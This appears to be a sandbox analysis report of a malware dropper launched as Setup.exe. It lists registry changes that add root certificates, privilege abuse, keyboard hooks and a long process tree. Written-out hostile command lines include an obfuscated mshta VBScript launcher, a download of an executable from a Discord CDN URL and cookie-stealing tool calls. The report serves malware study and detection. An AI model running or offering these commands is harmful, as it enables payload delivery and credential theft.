| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-SS4QK.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-Q50BO.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\mOwx1UOkucJxsBjOd3SFb_rP.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8237174.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\6253116.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\t7OWSfKbq0NFTEXuLax48kcT.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4629710.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\ugle20q5ojkWW5kU8LWLcBJ8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JLJVJ.tmp\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A8C4.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\ZHYhIavsfxgIeCf6Z3BlV1bl.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv spk7Mq6mdk6K+NQLk1ou5Q.0.2
C:\Users\Admin\Documents\t7OWSfKbq0NFTEXuLax48kcT.exe
"C:\Users\Admin\Documents\t7OWSfKbq0NFTEXuLax48kcT.exe"
C:\Users\Admin\Documents\r0v38CBGa1HE7SlWs5A7ASfm.exe
"C:\Users\Admin\Documents\r0v38CBGa1HE7SlWs5A7ASfm.exe"
C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe
"C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe"
C:\Users\Admin\Documents\I09RwQv0rQtQjRrDBtVBhpJX.exe
"C:\Users\Admin\Documents\I09RwQv0rQtQjRrDBtVBhpJX.exe"
C:\Users\Admin\Documents\tA4XBm6IGRVUpYbhMVhLz8__.exe
"C:\Users\Admin\Documents\tA4XBm6IGRVUpYbhMVhLz8__.exe"
C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe
"C:\Users\Admin\Documents\P54TayrSRCWbbcdY6GCag4b7.exe"
C:\Users\Admin\Documents\LQlkXepVr3q4X1m6pmAxdFwZ.exe
"C:\Users\Admin\Documents\LQlkXepVr3q4X1m6pmAxdFwZ.exe"
C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe
"C:\Users\Admin\Documents\wshBWvHSW7E9Z5tpJBDL6bK9.exe"
C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe
"C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe"
C:\Users\Admin\Documents\ugle20q5ojkWW5kU8LWLcBJ8.exe
"C:\Users\Admin\Documents\ugle20q5ojkWW5kU8LWLcBJ8.exe"
C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe
"C:\Users\Admin\Documents\YoUqTbAnGXDdz5IYILTVMbIP.exe"
C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe
"C:\Users\Admin\Documents\6eJYmeT9l2nkBLhdXpHIu5jX.exe"
C:\Users\Admin\Documents\Cs2UBYKrVp_jXnxYnS5OkRRN.exe
"C:\Users\Admin\Documents\Cs2UBYKrVp_jXnxYnS5OkRRN.exe"
C:\Users\Admin\Documents\UqhaRd9yaOQ_tGP0e6IdT3Mz.exe
"C:\Users\Admin\Documents\UqhaRd9yaOQ_tGP0e6IdT3Mz.exe"
C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe
"C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe"
C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe
"C:\Users\Admin\Documents\KuXpHUaLbM1TdWQ5WTxiUJ9E.exe"
C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe
"C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe"
C:\Users\Admin\Documents\k_d_iWj41GGBlWEK8ASYxa3i.exe
"C:\Users\Admin\Documents\k_d_iWj41GGBlWEK8ASYxa3i.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\BBE5.bat C:\Users\Admin\Documents\tA4XBm6IGRVUpYbhMVhLz8__.exe"
C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe
"C:\Users\Admin\Documents\sV1Jn1lT16wMLBIKSnWq35QV.exe"
C:\Users\Admin\Documents\M7ra4gQ14dQBpMxjqjuHmHYI.exe
"C:\Users\Admin\Documents\M7ra4gQ14dQBpMxjqjuHmHYI.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe
"C:\Users\Admin\Documents\WDTkVNhFhmcoEMERJYQBQl7Q.exe"
C:\Users\Admin\Documents\fphEOT1EWt2RJIwPlxup11t4.exe
"C:\Users\Admin\Documents\fphEOT1EWt2RJIwPlxup11t4.exe"
C:\Users\Admin\Documents\tAYT1FZs4zv8MCsehgIjSWm7.exe
"C:\Users\Admin\Documents\tAYT1FZs4zv8MCsehgIjSWm7.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\R_W8nY_SRCGM1xnY1EePovjK.exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\ucKGnlQzLW4NVL8nnw09GARf.exe
"C:\Users\Admin\Documents\ucKGnlQzLW4NVL8nnw09GARf.exe"
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1548 -ip 1548
C:\Users\Admin\AppData\Local\Temp\is-JTI35.tmp\ucKGnlQzLW4NVL8nnw09GARf.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JTI35.tmp\ucKGnlQzLW4NVL8nnw09GARf.tmp" /SL5="$3026C,138429,56832,C:\Users\Admin\Documents\ucKGnlQzLW4NVL8nnw09GARf.exe"
C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe
"C:\Users\Admin\Documents\uRay4026UiM7xMPbYxI6iz8R.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2368 -ip 2368
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe
C:\Users\Admin\Documents\AhJPwrJS8kuvRpnEJKnRhIHz.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4724 -ip 4724
C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe
C:\Users\Admin\Documents\nV85MKdCM6UbmW1CLFfhV2SD.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 272
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 276
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 312
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "R_W8nY_SRCGM1xnY1EePovjK.exe" -f
C:\Users\Admin\Documents\M7ra4gQ14dQBpMxjqjuHmHYI.exe
"C:\Users\Admin\Documents\M7ra4gQ14dQBpMxjqjuHmHYI.exe" -q
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1708 -ip 1708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1452 -ip 1452
C:\Users\Admin\AppData\Roaming\4629710.exe
"C:\Users\Admin\AppData\Roaming\4629710.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 856 -ip 856
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 736
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3180 -ip 3180
C:\Users\Admin\AppData\Roaming\8119797.exe
"C:\Users\Admin\AppData\Roaming\8119797.exe"
C:\Users\Admin\AppData\Roaming\5057999.exe
"C:\Users\Admin\AppData\Roaming\5057999.exe"
C:\Users\Admin\AppData\Roaming\8041802.exe
"C:\Users\Admin\AppData\Roaming\8041802.exe"
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\28960\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4244 -ip 4244
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BBE3.tmp\BBE4.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QD05A.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 276
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
